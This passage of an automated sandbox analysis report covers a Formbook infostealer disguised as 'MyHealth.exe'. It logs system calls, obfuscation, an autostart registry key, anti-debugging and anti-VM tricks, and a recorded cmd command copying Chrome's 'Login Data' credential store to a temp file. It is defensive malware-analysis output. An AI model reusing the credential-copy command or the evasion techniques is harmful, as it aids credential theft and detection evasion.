Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A540 NtDelayExecution,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A240 NtReadFile,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A2D0 NtClose,LdrInitializeThunk
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A710 NtQuerySection
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A780 NtOpenDirectoryObject
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A650 NtQueueApcThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A6D0 NtCreateProcessEx
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40BD40 NtSuspendThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A520 NtEnumerateKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A5A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A460 NtOpenProcess
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A470 NtSetInformationFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40B470 NtOpenThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40B410 NtOpenProcessToken
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A430 NtQueryVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40ACE0 NtCreateMutant
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A350 NtQueryValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A370 NtQueryInformationProcess
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A310 NtEnumerateValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A3D0 NtCreateKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A260 NtWriteFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A220 NtWaitForSingleObject
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40BA30 NtSetContextThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A2F0 NtQueryInformationFile
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40A800 NtSetValueKey
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_1F40B0B0 NtGetContextThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F0084 NtSetInformationThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F2A1D NtSetInformationThread
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F135E Sleep,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F0BD0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F0BAA CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F25FD NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F13B3 LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: 17_2_004F25DA NtProtectVirtualMemory
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: String function: 1F444F10 appears 50 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: String function: 1F41DDE8 appears 86 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: String function: 1F455110 appears 76 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe | Code function: String function: 1F3CB0E0 appears 352 times
Source: C:\Users\user\Desktop\MyHealth.exe | Code function: String function: 000F63EC appears 62 times
PE file contains strange resources
Source: MyHealth.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: MyHealth.exe, 00000000.00000002.761370251.000000000040B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Source: MyHealth.exe | Binary or memory string: OriginalFilename vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.831234894.0000000002460000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.831206989.0000000002450000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.829796744.0000000000183000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameWWAHost.exej% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000000.760838720.000000000040B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Source: MyHealth.exe | Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\WWAHost.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification label
Source: classification engine -- Classification label: mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
Creates files inside the user directory
Source: C:\Windows\SysWOW64\WWAHost.exe -- File created: C:\Users\user\AppData\Roaming\O2116906
Creates mutexes
Source: C:\Windows\System32\conhost.exe -- Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Windows\System32\conhost.exe -- Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe -- File created: C:\Users\user\AppData\Local\Temp\G8prdul4
PE file has an executable .text section and no other executable section
Source: MyHealth.exe -- Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\MyHealth.exe -- Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini files
Source: C:\Windows\explorer.exe -- File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\MyHealth.exe -- Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\Desktop\MyHealth.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MyHealth.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MyHealth.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MyHealth.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WWAHost.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: MyHealth.exe -- Virustotal: Detection: 68%
Source: MyHealth.exe -- Metadefender: Detection: 45%
Source: MyHealth.exe -- ReversingLabs: Detection: 64%
Spawns processes
Source: unknown -- Process created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknown -- Process created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknown -- Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknown -- Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknown -- Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown -- Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown -- Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: unknown -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Source: unknown -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: unknown -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Source: unknown -- Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown -- Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown -- Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\MyHealth.exe -- Process created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe'
Source: C:\Windows\explorer.exe -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: C:\Windows\explorer.exe -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MyHealth.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\WWAHost.exe -- File written: C:\Users\user\AppData\Roaming\O2116906\O21logri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder -- Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\WWAHost.exe -- Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdb source: MyHealth.exe
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp
Source: Binary string: systray.pdb source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: MyHealth.exe, 00000002.00000002.829524033.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1100285506.000000001F4BF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1102525562.000000001F3A0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: jj0t1be8.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 0_2_00401FEB push es; iretd 0_2_00401FF1
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 0_2_004013EC push 00402243h; ret 0_2_004013F6
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 0_2_004057B1 pushfd ; retf 0_2_004057B8
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_000F63C9 push ecx; ret 2_3_000F63DC
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_000ED81D push ecx; ret 2_3_000ED830
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_000A6E44 push eax; retn 0007h 2_3_000A6E45
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F41DE2D push ecx; ret 16_2_1F41DE40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3A92E1 push es; iretd 16_2_1F3A92E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3AA830 push es; iretd 16_2_1F3AA831
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 17_2_1F41DE2D push ecx; ret 17_2_1F41DE40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 17_2_1F3A92E1 push es; iretd 17_2_1F3A92E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 17_2_1F3AA830 push es; iretd 17_2_1F3AA831

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\WWAHost.exe -- Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCN
Source: C:\Windows\SysWOW64\WWAHost.exe -- Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCN

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\MyHealth.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MyHealth.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MyHealth.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\WWAHost.exe -- RDTSC instruction interceptor: First address: 0000000000C17244 second address: 0000000000C1724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe -- RDTSC instruction interceptor: First address: 0000000000C174AE second address: 0000000000C174B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe -- RDTSC instruction interceptor: First address: 0000000000577244 second address: 000000000057724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe -- RDTSC instruction interceptor: First address: 00000000005774AE second address: 00000000005774B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe -- RDTSC instruction interceptor: First address: 0000000002847244 second address: 000000000284724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe -- RDTSC instruction interceptor: First address: 00000000028474AE second address: 00000000028474B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F495595 rdtsc 16_2_1F495595
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- API coverage: 4.6 %
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- API coverage: 4.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\MyHealth.exe TID: 3812 -- Thread sleep count: 178 > 30
Source: C:\Windows\explorer.exe TID: 2368 -- Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1044 -- Thread sleep count: 64 > 30
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1044 -- Thread sleep time: -320000s >= -30000s
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe TID: 5032 -- Thread sleep count: 108 > 30
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe TID: 1344 -- Thread sleep count: 90 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe -- Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp -- Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp -- Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp -- Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp -- Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp -- Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmp -- Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp -- Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processes
Source: C:\Users\user\Desktop\MyHealth.exe -- Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A50084 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 15_2_02A50084
Hides threads from debuggers
Source: C:\Users\user\Desktop\MyHealth.exe -- Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\MyHealth.exe -- Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\MyHealth.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\MyHealth.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe -- Process queried: DebugPort
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process queried: DebugPort
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F495595 rdtsc 16_2_1F495595
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_000F202D LdrInitializeThunk, 2_3_000F202D
Contains functionality to read the PEB
